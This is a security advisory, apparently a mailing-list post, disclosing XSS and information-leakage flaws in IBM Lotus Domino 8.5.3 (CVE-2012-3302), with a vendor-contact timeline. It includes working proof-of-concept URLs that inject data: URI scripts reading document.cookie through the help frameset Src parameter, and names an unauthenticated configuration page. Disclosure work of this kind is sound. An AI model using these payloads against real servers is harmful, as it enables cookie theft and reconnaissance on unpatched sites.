XSS and IL vulnerabilities in IBM Lotus Domino

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Information Leakage vulnerabilities in IBM Lotus Domino. At 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3302.

Affected products:

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. XSS vulnerabilities will be fixed in Domino 8.5.4 and IBM are still working on Information Leakage and other vulnerabilities, about which I've informed them.

For fixes, workarounds and mitigations reference to IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

Details:

XSS (WASC-08):

This XSS in March 2008 worked in such way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since that time vector of attack via javascript: URI was fixed (it's quite possible that my German client informed IBM in 2008 about multiple holes, which I found in Domino). But there is a possibility to attack via data: and vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

At page https://site/domcfg.nsf, which is accessible without authentication, there is a leakage of information about Web Server Configuration. Such situation I saw at many sites on Lotus Domino.

Timeline:

• During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site.
• During 16.05-20.05 I've wrote five advisories via contact form at IBM site. No reaction from "IT security".
• At 20.05 I've contacted "Software support". Received formal answer.
• At 20.05 informed support, that this is security issues (not something small, which they can just ignore) and they need to sent it to security department. Again received formal answer - this time with "call me maybe" paragraph. In result IBM employees just ignored.
• At 30.05 I've contacted IBM PSIRT directly. They said they didn't received anything, not from me via contact form, nor from support. The same as they didn't do anything (no security audit of their software) to make these multiple vulnerabilities in multiple IBM software to go to the wild.
• At 31.05 I've resend five advisories, which they received and said they would send them to the developers (of Lotus products).
• At 06.06, after silence from PSIRT, I've reminded them. They said there is still no info from developers.
• At 10.07, after more then month of silence since last time from PSIRT, I've reminded them. No answer from them. This looks like IBM developers have decided to ignore these vulnerabilities.
• At 14.07 I've informed IBM PSIRT, that due to their ignoring I'd plan public disclosure of these vulnerabilities on July.
• At 18.07, 12:06 AM, PSIRT answered (after 1,5 months of silence) and said that previous day they had meeting with developers, which were working on these issues, and they started to fix them. No concrete deadline, they just started.
• At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just few from total amount of holes).
• At 27.08.2012 I've disclosed these vulnerabilities (first advisory) at my site (http://websecurity.com.ua/5826/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua